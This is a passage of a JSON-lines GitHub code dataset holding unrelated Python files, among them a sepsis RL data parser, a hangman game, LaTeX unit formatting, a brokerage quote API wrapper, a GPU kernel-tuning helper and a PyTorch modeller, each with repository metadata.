iterator:\n # create the state: concatenation of numerical values (logged or not logged), the binary actions, and the binary features (gender, re_admission)\n state_action_bin = df[binary_actions_columns].values\n state_features_bin = df[binary_features_columns].values\n state_num_not_logged = scaler.transform(df[numerical_columns_not_to_be_logged])\n state_num_logged = log_scaler.transform(np.log(df[numerical_columns_to_be_logged]))\n state = np.concatenate([state_num_not_logged, state_num_logged, state_action_bin, state_features_bin], -1)\n\n # actions\n if log_action:\n actions = action_scaler.transform(df[log_action_cols].values)\n else:\n actions = action_scaler.transform(df[action_cols].values)\n\n # rewards: 0 always, and final +-RMAX depending on the\n rewards = np.zeros((len(df), ))\n# if df[['mortality_90d']].iloc[0].values[0] == 1:\n# if df[['died_in_hosp']].iloc[0].values[0] == 1:\n# rewards[-1] = -RMAX\n# else:\n# rewards[-1] = RMAX\n\n if df[['mortality_90d']].iloc[0].values[0] == 1:\n rewards[-1] = -RMAX\n else:\n rewards[-1] = RMAX \n\n # add transitions to the list\n for k in range(len(df) - 1):\n TRANSITIONS.append((state[k], actions[k], rewards[k], state[k+1]))\n TRANSITIONS.append((state[-1], actions[-1], rewards[-1], None))\n\n return TRANSITIONS\n","repo_name":"cfosco/reinforcement_learning_sepsis","sub_path":"parse_dataset.py","file_name":"parse_dataset.py","file_ext":"py","file_size_in_byte":12805,"program_lang":"python","lang":"en","doc_type":"code","stars":6,"dataset":"github-code","pt":"54"} +{"seq_id":"73423463840","text":"#Step 4\n\nimport random\n\nstages = ['''\n +---+\n | |\n O |\n /|\\ |\n / \\ |\n |\n=========\n''', '''\n +---+\n | |\n O |\n /|\\ |\n / |\n |\n=========\n''', '''\n +---+\n | |\n O |\n /|\\ |\n |\n |\n=========\n''', '''\n +---+\n | |\n O |\n /| |\n |\n |\n=========''', '''\n +---+\n | |\n O |\n | |\n |\n |\n=========\n''', '''\n +---+\n | |\n O |\n |\n |\n |\n=========\n''', '''\n +---+\n | |\n |\n |\n |\n |\n=========\n''']\n\nend_of_game = False\nword_list = [\"aardvark\", \"baboon\", \"camel\", \"Hello\", \"World\", \"This\", \"Beautiful\", \"Anjikaran\", \"Manan\", \"Noname\", \"anonymous\", \"blackhat\", \"ardvark\"]\nchosen_word = random.choice(word_list)\nword_length = len(chosen_word)\n\nlives = 6\n\n#Create blanks\ndisplay = []\nfor _ in range(word_length):\n display += \"_\"\nprint(f\"This is {word_length} letter word.\")\nwhile not end_of_game:\n guess = input(\"Guess a letter: \").lower()\n\n #Check guessed letter\n for position in range(word_length):\n letter = chosen_word[position]\n\n if letter.lower() == guess.lower():\n display[position] = letter\n print(stages[lives])\n\n if guess.lower() not in chosen_word:\n if lives > 0:\n lives = lives - 1\n print(stages[lives])\n else:\n end_of_game=True\n print(\"You Lose\")\n print(stages[lives])\n \n #Join all the elements in the list and turn it into a String.\n print(f\"{' '.join(display)}\")\n\n #Check if user has got all letters.\n if \"_\" not in display:\n end_of_game = True\n print(\"You win.\")\n print(stages[lives])","repo_name":"cryptic-hunter/Learning-Python","sub_path":"day-007/code4.py","file_name":"code4.py","file_ext":"py","file_size_in_byte":1664,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"54"} +{"seq_id":"25377224614","text":"from collections import defaultdict\n\ndef solution(id_list, report, k):\n answer = []\n report = list(set(report))\n dic = defaultdict(list) # dic[re[0]] = re[1] 이런식으로 하면 muzi가 두번 신고했는데 마지막 신고만 들어가게 된다.\n cnt = defaultdict(int) # int형으로 해야 신고 안당한 경우도 apeach : 0 이런식으로 나와 에러가 안나온다.\n\n for r in report:\n re = r.split()\n dic[re[0]].append(re[1])\n cnt[re[1]] += 1\n \n for i in id_list:\n res = 0\n for u in dic[i]: # muzi가 신고한 두개에 대해서 메일을 받야야 하므로\n if cnt[u] >= k:\n res += 1\n answer.append(res)\n \n return answer\n\nid_list = [\"muzi\", \"frodo\", \"apeach\", \"neo\"]\nreport = [\"muzi frodo\",\"apeach frodo\",\"frodo neo\",\"muzi neo\",\"apeach muzi\"]\nk = 2\nprint(solution(id_list, report, k))\n\n\"\"\"\ndefaultdict가 없었다면 \n\ndic = {} \nif re[0] not in dic: --> 이런식인데 이렇게 하면 아래처럼 나오게 된다.\n dic[re[0]] += re[1] {'muzi': 'frodoneo', 'apeach': 'frodomuzi', 'frodo': 'neo'}\nelse:\n dic[re[0]] = re[1]\n\"\"\"","repo_name":"noxknow/Python-Coding_test","sub_path":"(05) 2022 카카오 블라인드, 인턴쉽/2022 카카오 블라인드 신고 결과 받기.py","file_name":"2022 카카오 블라인드 신고 결과 받기.py","file_ext":"py","file_size_in_byte":1185,"program_lang":"python","lang":"ko","doc_type":"code","stars":1,"dataset":"github-code","pt":"54"} +{"seq_id":"9466829562","text":"from __future__ import division\n\nimport os\n\nfrom astropy import units\nfrom astropy.units.format import (latex as ulatex, utils as uutils)\n\n__author__ = \"Duncan M. Macleod \"\n\nUSE_TEX = os.system('which pdflatex > %s 2>&1' % os.devnull) == 0\n\nLATEX_CONTROL_CHARS = [\"%\", \"\\\\\", \"_\", \"~\", \"&\"]\n\nMACROS = [\n r'\\def\\rtHz{\\ensuremath{\\sqrt{\\mathrm{Hz}}}}', # \\sqrt{Hz} label\n]\n\n\ndef float_to_latex(x, format=\"%.2g\"):\n \"\"\"Convert a floating point number to a latex representation.\n In particular, scientific notation is handled gracefully: e -> 10^\n Example:\n @code\n >>> float_to_latex(2000)\n '2\\times 10^{3}'\n @endcode\n @returns a string in latex mathmode\n \"\"\"\n base_str = format % x\n if \"e\" not in base_str:\n return base_str\n mantissa, exponent = base_str.split(\"e\")\n if float(mantissa).is_integer():\n mantissa = int(float(mantissa))\n exponent = exponent.lstrip(\"0+\")\n if exponent.startswith('-0'):\n exponent = '-' + exponent[2:]\n if float(mantissa) == 1.0:\n return r\"10^{%s}\" % exponent\n else:\n return r\"%s\\!\\!\\times\\!\\!10^{%s}\" % (mantissa, exponent)\n\n\ndef label_to_latex(text):\n \"\"\"Convert an abitrary string of text into a latex-passable\n representation.\n \"\"\"\n if text is None:\n return ''\n for ch in LATEX_CONTROL_CHARS:\n text = text.replace(ch, \"\\\\%s\" % ch)\n return text\n\n\ndef unit_to_latex(unit):\n if isinstance(unit, units.NamedUnit):\n s = label_to_latex(unit.name)\n elif isinstance(unit, units.CompositeUnit):\n if unit.scale != 1:\n s = float_to_latex(unit.scale) + r'\\ '\n else:\n s = ''\n if len(unit.bases):\n positives, negatives = uutils.get_grouped_by_powers(\n unit.bases, unit.powers)\n if len(negatives) == 1:\n negatives = format_unit_list(negatives)\n positives = positives and format_unit_list(positives) or 1\n s += r'{0}/{1}'.format(positives, negatives)\n elif len(negatives):\n if len(positives):\n positives = format_unit_list(positives)\n else:\n positives = ''\n negatives = format_unit_list(negatives, negative=True)\n s += r'{0}\\,{1}'.format(positives, negatives)\n else:\n positives = format_unit_list(positives)\n s += positives\n return r'$\\mathrm{{{0}}}$'.format(s)\n\n\ndef format_unit_list(unitlist, negative=False):\n out = []\n texformatter = ulatex.Latex()\n for base, power in unitlist:\n if power == 1 and not negative:\n out.append(texformatter._get_unit_name(base))\n elif power == 0.5 and not negative:\n out.append('\\sqrt{{{0}}}'.format(label_to_latex(base.name)))\n elif power != 1 and 1/power == int(1/power):\n out.append('{0}^{{1/{1}}}'.format(\n label_to_latex(base.name), int(1/power)))\n elif negative:\n out.append('{0}^{{-{1}}}'.format(\n label_to_latex(base.name), power))\n else:\n out.append('{0}^{{{1}}}'.format(\n label_to_latex(base.name), power))\n return r'\\,'.join(out)\n","repo_name":"pmeyers279/basketball_db","sub_path":"basketball_db/plotter/tex.py","file_name":"tex.py","file_ext":"py","file_size_in_byte":3270,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"54"} +{"seq_id":"41218155854","text":"from parsley.test import *\nfrom wooly import *\n\nfrom user import *\nfrom util import *\n\nlog = logging.getLogger(\"cumin.test\")\n\nclass CuminTest(Test):\n def __init__(self, app):\n super(CuminTest, self).__init__(\"cumin\", None)\n\n self.app = app\n self.user = None\n\n def init(self):\n for module in self.app.modules:\n module.init_test(self)\n\n super(CuminTest, self).init()\n\n def do_run(self, session):\n log.info(\"Waiting for the broker to connect\")\n\n def connect():\n if self.app.model.mint.model.agents:\n log.info(\"The broker is connected\")\n return True\n\n connected = retry(connect)\n\n if not connected:\n raise Exception(\"Failed to connect to broker\")\n\n self.user = Subject.getByName(\"tester\")\n\n if not self.user:\n self.user = Subject(name=\"tester\", password=\"XXX\")\n self.user.syncUpdate()\n\n super(CuminTest, self).do_run(session)\n\nclass TaskFormTest(Test):\n def __init__(self, name, parent, task):\n super(TaskFormTest, self).__init__(name, parent)\n\n self.task = task\n\n def enter(self, session, s):\n return self.task.enter(s, None)\n\n def add_input(self, session, s):\n pass\n\n def check(self, session, s):\n pass\n\n def do_run(self, session):\n s = MainPageSession(self.harness)\n\n s = self.enter(session, s)\n\n check_render(s)\n\n self.add_input(session, s)\n\n check_submit_form(s, self.task.form)\n\n self.check(session, s)\n\n super(TaskFormTest, self).do_run(session)\n \nclass MainPageSession(Session):\n def __init__(self, harness):\n super(MainPageSession, self).__init__(harness.test.app.main_page)\n\n usess = UserSession(harness.test.app, harness.test.user)\n self.user_session = usess\n\ndef retry(fn):\n result = None\n\n for i in range(10):\n result = fn()\n\n if result:\n break\n\n sleep(1)\n\n return result\n\ndef check_render(session):\n session.page.process(session)\n session.page.render(session)\n\ndef check_submit_form(session, form):\n form.submit(session)\n\n session.page.process(session)\n\n redirect = session.page.redirect.get(session)\n\n if redirect is None:\n errors = task.form.errors.get(ns)\n\n if errors:\n raise Exception(\"Unexpected form input errors\")\n\n nsession = Session.unmarshal(session.page.app, redirect)\n\n check_render(nsession)\n\ndef check_get_object(cls, **criteria):\n def get():\n for obj in cls.selectBy(**criteria):\n return obj\n\n obj = retry(get)\n\n if not obj:\n args = (cls.__name__, criteria)\n raise Exception(\"Object %s(%s) not found\" % args)\n\n return obj\n\ndef check_removed(cls, **criteria):\n def find():\n for obj in cls.selectBy(**criteria):\n return\n\n return True\n\n removed = retry(find)\n\n if not removed:\n args = (cls.__name__, criteria)\n raise Exception(\"Object %s(%s) not removed\" % args)\n","repo_name":"ssorj/boneyard","sub_path":"spicerack/cumin/python/cumin/test.py","file_name":"test.py","file_ext":"py","file_size_in_byte":3071,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"54"} +{"seq_id":"74539416801","text":"# -*- coding: utf-8 -*-\n#REF: https://easontseng.blogspot.com/2017/\n\nimport pythoncom, time, os,threading\nimport comtypes.client as cc\nfrom datetime import datetime\nimport matplotlib.pyplot as plt\nfrom logging import handlers\n\nclass CAP_Quoter(threading.Thread):\n\t#建立事件類別\n\tclass skQ_events:\n\t\tdef __init__(self, parent):\n\t\t\tself.MSG=parent.MSG\n\t\t\tself.parent=parent\n\t\tdef OnConnection(self, nKind, nCode):\n\t\t\tself.parent.log.critical('[e]OnConnection:', self.MSG(nKind),nKind, self.MSG(nCode))\t\n\t\t\tif nKind==3003: self.parent.step2()\n\t\t\t\t\n\t\tdef OnNotifyServerTime(self,sHour,sMinute,sSecond,nTotal):\n\t\t\tself.parent.watchdog=0 #log.info(sHour,\":\",sMinute,\":\",sSecond,\"--\",nTotal)\n\t\tdef OnNotifyQuote(self, sMarketNo, sStockidx):\n\t\t\tself.parent.log.info(sMarketNo,sStockidx)\n\t\tdef OnNotifyHistoryTicks(self, sMarketNo, sStockIdx, nPtr, lDate, lTimehms, lTimemillismicros, nBid, nAsk, nClose, nQty, nSimulate):\n\t\t\tself.parent.log.info(sMarketNo, sStockIdx, nPtr, lTimehms, nClose, nQty)\n\t\tdef OnNotifyTicks(self,sMarketNo, sStockIdx, nPtr, lDate, lTimehms, lTimemillismicros, nBid, nAsk, nClose, nQty, nSimulate):\n\t\t\tself.parent.log.info(sMarketNo, sStockIdx, nPtr, lDate, lTimehms, lTimemillismicros, nBid, nAsk, nClose, nQty, nSimulate)\n\t\tdef OnNotifyKLineData(self,bstrStockNo,bstrData):\n\t\t\tself.parent.log.info(bstrStockNo,bstrData)\n\t\tdef OnNotifyFutureTradeInfo(self,bstrStockNo,sMarketNo,sStockidx,nBuyTotalCount,nSellTotalCount,nBuyTotalQty\t,nSellTotalQty,nBuyDealTotalCount,nSellDealTotalCount):\n\t\t\tself.parent.log.info(sMarketNo,sStockidx,nBuyTotalCount,nSellTotalCount,nBuyTotalQty,nSellTotalQty,nBuyDealTotalCount,nSellDealTotalCount,bstrStockNo)\n\t\tdef OnNotifyStockList(self,sMarketNo,bstrStockData):\n\t\t\tif self.parent.FilterStockList(sMarketNo,bstrStockData):\tself.parent.step3()\n\t\t\n\tdef __init__(self,tid,tpw,log):\n\t\tthreading.Thread.__init__(self)\n\t\tcc.GetModule(os.path.split(os.path.realpath(__file__))[0] + r'\\SKCOM.dll')\n\t\tfrom comtypes.gen import SKCOMLib as sk\n\t\tself.skC=cc.CreateObject(sk.SKCenterLib,interface=sk.ISKCenterLib)\n\t\tself.skQ=cc.CreateObject(sk.SKQuoteLib,interface=sk.ISKQuoteLib)\n\t\tself.EventQ=self.skQ_events(self)\n\t\tself.ConnectionQ = cc.GetEvents(self.skQ, self.EventQ)\n\t\tself.feature_list=[]\n\t\tself.option_list=[]\n\t\tself.feature_code=\"\"\n\t\tself.option_code=\"\"\n\t\tself.watchdog=0\n\t\tself.id=tid\n\t\tself.pw=tpw\n\t\tself.log=log\n\t\t\n\tdef join(self):\n\t\tself.log.critical(\"[9]LeaveMonitor:\", self.MSG(self.skQ.SKQuoteLib_LeaveMonitor()))\t\n\t\tthreading.Thread.join(self)\n\n\t\t\t\n\tdef MSG(self,code):\n\t\treturn self.skC.SKCenterLib_GetReturnCodeMessage(code)\n\t\n\tdef step1(self):\n\t\tself.log.critical(\"[1]Login:\", self.MSG(self.skC.SKCenterLib_Login(self.id,self.pw)))\n\t\tself.log.critical(\"[2]EnterMonitor:\", self.MSG(self.skQ.SKQuoteLib_EnterMonitor()))\t\n\t\t\n\tdef step2(self):\n\t\tself.log.critical(\"[3]RequestFutureList:\", self.MSG(self.skQ.SKQuoteLib_RequestStockList(2)))\n\t\tself.log.critical(\"[4]RequestOptionList:\", self.MSG(self.skQ.SKQuoteLib_RequestStockList(3)))\n\t\t\n\tdef step3(self):\n\t\timport ctypes\n\t\tself.log.critical(self.option_code)\n\t\tself.log.critical(self.feature_code)\n#\t\tfor fc in self.feature_code.split(\",\"):\n#\t\t\tr=self.skQ.SKQuoteLib_RequestTicks(-1, fc)\n#\t\t\tself.log.critical(\"[5]RequestLiveTick:\",fc, self.MSG(r[1]),r[0])\n#\t\t\tself.log.critical(\"[6]RequestFutureTradeInfo:\",fc, self.MSG(self.skQ.SKQuoteLib_RequestFutureTradeInfo(ctypes.c_short(r[0]), fc)))\n\t\t\t\n\tdef FilterStockList(self,sMarketNo,bstrStockData):\n\t\ttmp_dict=bstrStockData.split(';')\n\t\tmarket_dict=[]\n\t\tmarket_code=[]\n\t\tfor m in tmp_dict:\n\t\t\tif ('TX' in m) and not('/' in m): \n\t\t\t\tc=m.split(',')[0]\n\t\t\t\tmarket_dict.append(m)\n\t\t\t\tmarket_code.append(c)\n\t\tif len(market_dict)<10: return False #避免出現 ['TXO06', 'TXO07', 'TXO08', 'TXO09', 'TXO12', 'TX106']\n\t\tif sMarketNo==2: \n\t\t\tself.feature_list=market_dict\n\t\t\tself.feature_code=\",\".join(market_code)\n\t\tif sMarketNo==3: \n\t\t\tself.option_list=market_dict\n\t\t\tself.option_code=\",\".join(market_code)\n\n\t\treturn len(self.feature_list)>0 and len(self.option_list)>0\n\t\n\tdef check_alive(self,period=10000):\n\t\tself.watchdog+=1\n\t\treturn self.watchdog len(self.points) - 1:\n return index % len(self.points)\n return index\n\n\nxy = random_trajectory()\n\narr = np.array(xy).T\n\nline = geom.LineString(arr)\n\nfig, ax = plt.subplots()\nax.plot(arr[:, 0][0:], arr[:, 1][0:])\nax.scatter(arr[:, 0][0:], arr[:, 1][0:], s=2.1)\n\nax.axis('equal')\nNearestPoint(line, ax, arr)\n\nplt.show()\n","repo_name":"nor-code/rl_sphere_robot","sub_path":"test/check_distance.py","file_name":"check_distance.py","file_ext":"py","file_size_in_byte":2907,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"54"} +{"seq_id":"23720843659","text":"import os.path\nimport pytest\nfrom guidescanpy.flask import create_app\nfrom guidescanpy import config\n\n\n@pytest.fixture(scope=\"session\")\ndef app():\n return create_app(debug=True)\n\n\n@pytest.fixture(scope=\"session\")\ndef bam_file():\n return os.path.join(os.path.dirname(__file__), \"data\", \"sacCer3.bam.sorted\")\n\n\n@pytest.fixture(scope=\"session\")\ndef sacCer3_chromosome_names():\n return {\n \"NC_001133.9\": \"chrI\",\n \"NC_001134.8\": \"chrII\",\n \"NC_001135.5\": \"chrIII\",\n \"NC_001136.10\": \"chrIV\",\n \"NC_001137.3\": \"chrV\",\n \"NC_001138.5\": \"chrVI\",\n \"NC_001139.9\": \"chrVII\",\n \"NC_001140.6\": \"chrVIII\",\n \"NC_001141.2\": \"chrIX\",\n \"NC_001142.9\": \"chrX\",\n \"NC_001143.9\": \"chrXI\",\n \"NC_001144.5\": \"chrXII\",\n \"NC_001145.3\": \"chrXIII\",\n \"NC_001146.8\": \"chrXIV\",\n \"NC_001147.6\": \"chrXV\",\n \"NC_001148.4\": \"chrXVI\",\n }\n\n\n@pytest.fixture(scope=\"session\")\ndef sacCer3_region_CNE1():\n return {\n \"entrez_id\": 851241,\n \"region_name\": \"CNE1\",\n \"start_pos\": 37464,\n \"end_pos\": 38972,\n \"sense\": True,\n \"chromosome_name\": \"chrI\",\n \"chromosome_accession\": \"NC_001133.9\",\n }\n\n\n@pytest.fixture(scope=\"session\")\ndef index_prefix():\n index_dir = config.guidescan.index_files_path_prefix\n index_prefix = config.guidescan.index_files_path_map.sacCer3\n index_prefix = os.path.join(index_dir, index_prefix)\n return index_prefix\n\n\n@pytest.fixture(scope=\"session\")\ndef data_folder():\n return os.path.join(os.path.dirname(__file__), \"data\")\n","repo_name":"pritykinlab/guidescanpy","sub_path":"tests/conftest.py","file_name":"conftest.py","file_ext":"py","file_size_in_byte":1589,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"54"} +{"seq_id":"16470793446","text":"import argparse\nimport numpy as np\nimport os\nimport pynvml\nimport re\n\nimport kernel_tuner\nfrom kernel_tuner.nvml import NVMLObserver\n\n\ndef get_default_parser():\n parser = argparse.ArgumentParser(description='Tune kernel.')\n parser.add_argument(\"--file\", required=True, help=\"Path to kernel source file\")\n parser.add_argument(\"--store-json\", action=\"store_true\")\n parser.add_argument(\"--tune-power-limit\", action=\"store_true\")\n parser.add_argument(\"--power-limit-steps\", nargs=\"?\")\n parser.add_argument(\"--tune-gr-clock\", action=\"store_true\")\n parser.add_argument(\"--gr-clock-steps\", nargs=\"?\")\n parser.add_argument(\"--tune-mem-clock\", action=\"store_true\")\n parser.add_argument(\"--mem-clock-steps\", nargs=\"?\")\n return parser\n\n\ndef get_kernel_string(filename):\n # Helper function to recursively get a parent directory\n def get_parent_dir(dirname, level=1):\n if (level == 0):\n return dirname\n else:\n parentdir = os.path.abspath(os.path.join(dirname, os.pardir))\n return get_parent_dir(parentdir, level -1)\n\n # All the directories to look for kernel sources and header files\n prefixes = []\n dirname_kernel = os.path.dirname(filename) # e.g. idg-lib/src/CUDA/common/kernels\n prefixes.append(dirname_kernel)\n dirname_src = get_parent_dir(dirname_kernel, 3) # e.g. idg-lib/src\n prefixes.append(dirname_src)\n\n # Helper function to recursively get file contents with local includes\n def add_file(filename, level=1):\n result = [\"\"]\n for prefix in prefixes:\n try:\n with open(f\"{prefix}/{filename}\", \"r\") as f:\n lines = f.readlines()\n for line in lines:\n # Match lines where a local header file is included\n if line.startswith('#include \"'):\n # Extract the name of the header file\n m = re.findall(r'\"(.*?)\"', line)\n\n # If a valid filename was found, add it recursively\n if len(m):\n header_file = m[0]\n padding = \"*\" * level\n result += f\"/{padding} BEGIN INLINE {header_file} {padding}/\\n\"\n result += add_file(header_file, level + 1)\n result += \"\\n\"\n result += (\n f\"/{padding} END INLINE {header_file} {padding}/\\n\"\n )\n else:\n result += [line]\n break\n except FileNotFoundError:\n # It is ok if a file is not found, it might exists in another prefix\n pass\n return result\n\n # Start gathering all the source lines\n filename_kernel = os.path.basename(filename) # e.g. KernelGridder.cu\n source_lines = add_file(filename_kernel)\n\n # Return the result as a string\n return \"\".join(source_lines)\n\n\ndef get_supported_mem_clocks(dev, n=0):\n mem_clocks = pynvml.nvmlDeviceGetSupportedMemoryClocks(dev)\n\n if n and len(mem_clocks) > n:\n mem_clocks = mem_clocks[::int(len(mem_clocks)/n)]\n\n return mem_clocks\n\n\ndef get_supported_gr_clocks(dev, mem_clock, n=0):\n assert mem_clock in get_supported_mem_clocks(dev)\n gr_clocks = pynvml.nvmlDeviceGetSupportedGraphicsClocks(\n dev, mem_clock\n )\n\n if n and (len(gr_clocks) > n):\n gr_clocks = gr_clocks[::int(len(gr_clocks)/n)]\n\n return gr_clocks\n\n\ndef setup_pwr_limit_tuning(dev, tune_params, n=None):\n print(\"> Setup power limit tuning\")\n (\n power_limit_min,\n power_limit_max,\n ) = pynvml.nvmlDeviceGetPowerManagementLimitConstraints(dev)\n power_limit_min *= 1e-3 # Convert to Watt\n power_limit_max *= 1e-3 # Convert to Watt\n power_limit_round = 5\n if n == None:\n n = int((power_limit_max - power_limit_min) / power_limit_round)\n tune_params[\"nvml_pwr_limit\"] = power_limit_round * np.round( # Rounded power limit values\n (np.linspace(power_limit_min, power_limit_max, n) / power_limit_round)\n )\n print(f\"Tuning nvml_pwr_limit = {tune_params['nvml_pwr_limit']}\")\n\n\ndef report_most_efficient(results, tune_params, metrics):\n best_config = min(results, key=lambda x: x[\"nvml_energy\"])\n print(\"most efficient configuration:\")\n kernel_tuner.util.print_config_output(\n tune_params, best_config, quiet=False, metrics=metrics, units=None)\n\n\ndef run_tuning(\n kernel_name,\n kernel_source,\n problem_size,\n kernel_arguments,\n tune_params,\n metrics,\n iterations,\n args\n):\n tune_power_limit = args.tune_power_limit\n power_limit_steps = int(\n args.power_limit_steps) if args.power_limit_steps else None\n tune_gr_clock = args.tune_gr_clock\n gr_clock_steps = int(\n args.gr_clock_steps) if args.gr_clock_steps else None\n tune_mem_clock = args.tune_mem_clock\n mem_clock_steps = int(\n args.mem_clock_steps) if args.mem_clock_steps else None\n\n nvmlobserver = NVMLObserver(\n [\n \"nvml_power\",\n \"nvml_energy\",\n \"core_freq\",\n \"mem_freq\",\n \"temperature\",\n ]\n )\n dev = nvmlobserver.nvml.dev\n\n def tune_kernel():\n results, env = kernel_tuner.tune_kernel(\n kernel_name=kernel_name,\n kernel_source=kernel_source,\n problem_size=problem_size,\n grid_div_x=[],\n arguments=kernel_arguments,\n tune_params=tune_params,\n verbose=False,\n metrics=metrics,\n observers=[nvmlobserver],\n iterations=iterations,\n compiler_options=[\"-use_fast_math\"],\n block_size_names=[\"BLOCK_SIZE_X\"]\n )\n return results\n\n if tune_power_limit:\n setup_pwr_limit_tuning(dev, tune_params, power_limit_steps)\n\n if tune_mem_clock:\n # When tuning for both the memory clocks as well as for the graphics clock,\n # we need to run the tuner once for every memory clock, such that only the\n # valid combinations of the two will be tested.\n mem_clocks = get_supported_mem_clocks(dev, mem_clock_steps)\n\n results = []\n for mem_clock in mem_clocks:\n tune_params['nvml_mem_clock'] = [mem_clock]\n\n # Setup valid graphics clocks for the current memory clock\n gr_clocks = get_supported_gr_clocks(dev, mem_clock, gr_clock_steps)\n if not tune_gr_clock:\n gr_clocks = [max(gr_clocks)]\n tune_params['nvml_gr_clock'] = gr_clocks\n\n # Start tuning\n results_ = tune_kernel()\n\n report_most_efficient(results_, tune_params, metrics)\n results += results_\n\n else:\n # When not tuning for memory clock, we use the maximum supported memory\n # clock and select the corresponding supported graphics clocks.\n if tune_gr_clock:\n mem_clocks = get_supported_mem_clocks(dev)\n mem_clock = max(mem_clocks)\n gr_clocks = get_supported_gr_clocks(dev, mem_clock, gr_clock_steps)\n tune_params['nvml_gr_clock'] = gr_clocks\n\n # Start tuning\n results = tune_kernel()\n\n report_most_efficient(results, tune_params, metrics)\n\n return results\n","repo_name":"kernsuite-debian/idg","sub_path":"idg-bin/tuning/helper.py","file_name":"helper.py","file_ext":"py","file_size_in_byte":7439,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"54"} +{"seq_id":"18630626668","text":"import numpy as np\n\ndef create_grid(filename):\n map_dict = {}\n dimensions = (0,0)\n temp_array = [] # create dictionary to return\n data =np.delete((np.loadtxt(filename, dtype=str, delimiter= \" \")),1 ,1) # strip extra characters from input\n for i in data:\n first = i[0].split(\",\")\n second = i[1].split(\",\")\n temp_array.append([(int(first[0]), int(first[1])), (int(second[0]), int(second[1]))])\n for i in temp_array:\n for j in i:\n if j[0] > dimensions[0]:\n dimensions = (j[0], dimensions[1])\n elif j[1] > dimensions[1]:\n dimensions = (dimensions[0], j[1])\n grid = np.zeros((dimensions[0]+1, dimensions[1]+1))\n data = np.array(temp_array)\n map_dict[\"map\"] = grid\n map_dict[\"data\"] = data\n return map_dict\n\ndef edit_map(dictionary):\n counter = 0\n counter_array = []\n for i,j in dictionary[\"data\"]:\n if i[0] == j[0] or i[1] == j[1]:\n counter_array.append(counter)\n counter += 1\n else:\n counter += 1\n for i in counter_array:\n first_tuple = (dictionary[\"data\"][i][0])\n second_tuple = (dictionary[\"data\"][i][1]) \n if first_tuple[0] == second_tuple[0]:\n top = max(int(first_tuple[1]), int(second_tuple[1]))\n bottom = min(int(first_tuple[1]), int(second_tuple[1]))\n for x in range(bottom, top+1):\n dictionary[\"map\"][x, int(first_tuple[0])] += 1\n elif first_tuple[1] == second_tuple[1]:\n top = max(int(first_tuple[0]), int(second_tuple[0]))\n bottom = min(int(first_tuple[0]), int(second_tuple[0]))\n for z in range(bottom, top+1):\n dictionary[\"map\"][int(first_tuple[1]), z] += 1\n \n return ((dictionary[\"map\"] > 1).sum())\n \ndef diagonal_map(dictionary):\n for coords in dictionary[\"data\"]:\n x_result = coords[0][0] == coords[1][0]\n y_result = coords[0][1] == coords [1][1]\n if x_result:\n bottom = min(coords[0][1], coords[1][1]) \n top = max(coords[0][1], coords[1][1])\n for i in range(bottom, top+1):\n dictionary[\"map\"][coords[0][0], i] += 1\n elif y_result:\n bottom = min(coords[0][0], coords[1][0])\n top = max(coords[0][0], coords[1][0])\n for i in range(bottom, top+1):\n dictionary[\"map\"][i, coords[0][1]] += 1\n else:\n if coords[0][0] < coords[1][0]:\n start = coords[0]\n end = coords[1]\n duration = end[0] - start[0]\n if start[1] < end[1]:\n for i in range(0, duration+1):\n dictionary[\"map\"][(start[0])+i, (start[1])+i] += 1\n else:\n for i in range(0, duration+1):\n dictionary[\"map\"][(start[0])+i, (start[1])-i] += 1\n else:\n start = coords[1]\n end = coords[0]\n duration = end[0] - start[0]\n if start[1] < end[1]:\n for i in range(0, duration+1):\n dictionary[\"map\"][(start[0])+i, (start[1])+i] += 1\n else:\n for i in range(0, duration+1):\n dictionary[\"map\"][(start[0])+i, (start[1])-i] += 1\n \n\n\n\n return ((dictionary[\"map\"] > 1).sum())\n\nif __name__ == \"__main__\":\n print(edit_map(create_grid(\"05.txt\")))\n print(diagonal_map(create_grid(\"05.txt\")))\n\n","repo_name":"zalazalaza/AOC2021","sub_path":"05/05.py","file_name":"05.py","file_ext":"py","file_size_in_byte":3522,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"54"} +{"seq_id":"40634541525","text":"\"\"\"class to create models with Pytorch statistical model.\"\"\"\n\nimport logging\nfrom pathlib import Path\nfrom typing import Tuple\n\nimport torch\nfrom torch import Tensor, nn\n\nfrom ..dataset.swan_data_base import SwanDataBase\nfrom ..type_hints import PathLike\nfrom ..utils.early_stopping import EarlyStopping\nfrom .base_modeller import BaseModeller\nimport numpy as np\nimport sklearn\n\n# Starting logger\nLOGGER = logging.getLogger(__name__)\n\n\nclass TorchModeller(BaseModeller[torch.Tensor]):\n \"\"\"Object to create statistical models.\"\"\"\n def __init__(self,\n network: nn.Module,\n data: SwanDataBase,\n replace_state: bool = False,\n use_cuda: bool = False):\n \"\"\"Base class of the modeller\n\n Parameters\n ----------\n network\n Torch Neural Network [description]\n dataset\n Torch Dataset\n replace_state\n Remove previous state file\n use_cuda\n Train the model using Cuda\n \"\"\"\n super().__init__(data, replace_state)\n torch.set_default_dtype(torch.float32)\n # Early stopping functionality\n self.early_stopping = EarlyStopping()\n\n # cuda support\n self.use_cuda = use_cuda\n if self.use_cuda:\n self.device = torch.device(\"cuda\")\n else:\n self.device = torch.device(\"cpu\")\n\n # create the network\n self.network = network.to(self.device)\n\n # set the default optimizer\n self.set_optimizer('SGD', lr=0.001)\n\n # set the default loss\n self.set_loss('MSELoss')\n\n # set scheduler\n self.set_scheduler('StepLR', 0.1)\n\n # I/O options\n self.workdir = Path('.')\n self.path_scales = self.workdir / \"swan_scales.pkl\"\n\n # current number of epoch\n self.epoch = 0\n\n # Loss data\n self.train_losses = []\n self.validation_losses = []\n\n def set_optimizer(self, name: str, *args, **kwargs) -> None:\n \"\"\"Set an optimizer using the config file\n\n Parameters\n ----------\n name\n optimizer name\n\n \"\"\"\n self.optimizer = torch.optim.__getattribute__(name)(\n self.network.parameters(), *args, **kwargs)\n\n def set_loss(self, name: str, *args, **kwargs) -> None:\n \"\"\"Set the loss function for the training.\n\n Parameters\n ----------\n name\n Loss function name\n\n \"\"\"\n self.loss_func = getattr(nn, name)(*args, 